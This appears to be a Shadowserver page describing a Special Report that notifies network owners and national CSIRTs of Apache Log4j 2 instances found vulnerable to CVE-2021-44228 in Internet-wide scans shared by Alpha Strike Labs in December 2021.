This Special Report contains information on potentially vulnerable Apache Log4j 2 instances that are at high risk from CVE-2021-44228 / “log4shell” exploitation. You can read more on the background to CVE-2021-44228 and this Special Report in our blog posts here and here.
Shadowserver Special Reports are unlike all of our other standard free daily network reports. They do not cover a specific time period.
Instead, we send out Special Reports in situations where we are able to share one-time, high value datasets that we feel should be reported responsibly for maximum public benefit. Sometimes there are incidents when it would be useful to be able to notify potential victims about events or breaches that may have impacted them outside of the previous 24 hour period – for example during high profile events such as the Solarwinds Orion/SUNBURST supply chain or HAFNIUM/Microsoft Exchange Server mass breaches, when it may take a number of days for incident responders to conduct forensic investigations and analyzed data becomes available for sharing with potential victims. Although the events included in these Special Reports will fall outside of our usual 24 hour daily reporting window, we believe that there would still be significant benefit to our constituents in receiving and hopefully acting on the retrospective data.
If you have missed a Special Report because you were NOT yet a subscriber at the time a report was pushed out, simply subscribe for your network now and specifically request all recent Shadowserver Special Reports – and we will regenerate them specifically for your network, at no cost.
Note that the data shared across special reports may differ on a case by case basis hence the report formats for different Special Reports may be different.
The data in this Vulnerable Log4j Special Report has been shared with Shadowserver by Alpha Strike Labs, who between December 11-13th 2021 used a seed list of ~300 million already known responding IP addresses from IPv4 /0 scans performed across 16 common ports to check for vulnerable log4j instances (Special Report #1). They repeated their scan in the period December 16th-22nd (Special Report #2). Their CVE-2021-44228 scan generated an outbound DNS response from vulnerable systems through the JNDI interface, allowing potentially vulnerable systems to be enumerated. Alpha Strike Labs have asked us to make this data available to National CSIRTs and network owners through Shadowserver’s proven channels.